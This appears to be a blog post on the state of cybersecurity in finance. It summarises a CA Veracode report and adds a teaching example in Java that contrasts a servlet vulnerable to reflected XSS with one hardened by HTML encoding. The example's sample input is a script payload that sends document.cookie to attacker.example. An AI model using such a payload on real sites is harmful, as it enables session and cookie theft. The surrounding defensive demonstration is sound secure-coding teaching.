Banks are investing big in cybersecurity. According to Lexology, HSBC has earmarked $1 billion for cybersecurity enhancements, while JPMorgan Chase has doubled down on spending with plans to hit $500 million by the end of 2015. Even financial institutions that aren't actively ramping up their own resources are busy backing startups they hope will provide the next generation of cybersecurity. All this investment raises the question: What's the real state of cybersecurity in finance?
As noted by Inside Counsel, part of what makes financial cybersecurity so difficult is the wide array of organizational types and sizes in the United States. No single rule, or set of rules, meets the needs of both small credit unions and billion-dollar banks while also keeping consumer data safe. But common ground does exist: every institution faces the risk of a cyberattack that exposes company data and puts consumer information in attackers' hands. Security tools are therefore designed to reduce that likelihood and to limit the damage when an attack succeeds, but that is only the beginning. Banks aren't just on the hook to fend off malicious attacks; they're also charged with handling sensitive data in a way that complies with regulatory standards. Doing so demands ongoing vendor oversight and significant insurance investments, as well as "embedding cybersecurity into the bank's culture and compliance systems."
In other words, there is no simple formula for financial cybersecurity: no institution can anticipate every attack path while also verifying that vendors live up to their security promises and that employees aren't accidentally putting sensitive data at risk. Banks now face an ultimatum: adapt, or cash out.
According to CA Veracode's new "State of Software Security Report: Focus on Industry Verticals," cybersecurity in finance is bullish and bearish in turns. On the compliance side, 42 percent of financial applications pass an OWASP Top 10 policy on their first assessment, putting the sector at the top of the list ahead of manufacturing (35 percent), healthcare (31 percent) and government (24 percent). What's more, 65 percent of the flaws detected in financial apps were fixed, the second-highest remediation rate by industry vertical after manufacturing. This is no surprise, since the protection of financial data is a top priority for regulators and consumers alike.
In other areas, however, financial cybersecurity falls short. For example, 65 percent of financial applications contain code quality flaws, and banks frequently carry both cross-site scripting (XSS) flaws, which let an attacker run script in a customer's browser session, and cryptographic weaknesses, which undermine the confidentiality of the data the application is meant to protect. Either can lead to significant data loss and reputational damage. It's also worth noting that financial apps tend to be written on one of two platforms: Java or the .NET framework. That concentration means the same flaw patterns recur across many institutions, so an attack technique that works against one Java or .NET banking application is likely to transfer to others; there is little chance of finding ColdFusion or PHP behind a banking front end.
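The report only names XSS as a flaw category; as an added illustration written for this page (not code from CA Veracode, the report, or any bank), the following Java snippet shows the reflected-XSS pattern a scanner would flag in a servlet that greets a customer by name, beside the hardened version. The `customer` parameter, the page fragment and the sample inputs are all constructed for the example, and the hand-rolled `htmlEncode` stands in for a maintained library such as the OWASP Java Encoder so the file compiles with the JDK alone.

```java
// Added example, not from the original post: reflected XSS in a
// hypothetical Java servlet fragment, and the fix (contextual output
// encoding). Compile and run with: javac XssExample.java && java XssExample
public class XssExample {

    // VULNERABLE: untrusted request data concatenated straight into HTML.
    // A value such as <script>...</script> is rendered as markup, not text,
    // so it executes in the victim's browser with the bank's origin.
    static String renderVulnerable(String customer) {
        return "<p>Welcome back, " + customer + "</p>";
    }

    // Encoder for the HTML element context. In production use a maintained
    // library (for example org.owasp.encoder.Encode.forHtml); this version
    // exists only so the example has no dependencies.
    static String htmlEncode(String s) {
        StringBuilder out = new StringBuilder(s.length());
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                case '/':  out.append("&#x2F;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // HARDENED: encode for the context the data lands in (here, element
    // content) at the point of output. Input validation alone is not a fix.
    static String renderHardened(String customer) {
        return "<p>Welcome back, " + htmlEncode(customer) + "</p>";
    }

    // Crude check for this demo only: is an unencoded opening tag still
    // present? Real verification uses a DOM parser or a browser.
    static boolean containsRawTag(String html, String tag) {
        return html.contains("<" + tag);
    }

    static void check(boolean condition, String message) {
        if (!condition) {
            throw new IllegalStateException(message);
        }
    }

    public static void main(String[] args) {
        // Constructed sample inputs: one benign name, one hostile payload.
        String benign = "Ada Lovelace";
        String hostile = "<script>fetch('https://attacker.example/?c='"
                       + "+document.cookie)</script>";

        System.out.println("vulnerable: " + renderVulnerable(hostile));
        System.out.println("hardened:   " + renderHardened(hostile));

        check(!containsRawTag(renderVulnerable(benign), "script"),
              "benign input should not produce a script tag");
        check(containsRawTag(renderVulnerable(hostile), "script"),
              "vulnerable path should reflect the payload as markup");
        check(!containsRawTag(renderHardened(hostile), "script"),
              "hardened path must neutralise the payload");
        check(renderHardened(benign).equals("<p>Welcome back, Ada Lovelace</p>"),
              "encoding must leave ordinary names untouched");
        System.out.println("checks passed");
    }
}
```

The point a scanner makes when it flags this pattern is not the specific payload but the missing encoding step: whatever the input, the hardened path emits it as text in the element context, and the same discipline (with a different encoder) applies to attribute, JavaScript and URL contexts.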
It all comes down to this: Banks are investing big in cybersecurity because they can tell which way the wind is blowing. Attack techniques keep evolving past established defenses. But investment alone isn't enough; financial institutions must also remediate the flaws in the code they already run, so that it both withstands attack and meets new regulatory standards. To learn more on the state of cybersecurity in finance, be sure to check out CA Veracode's full report.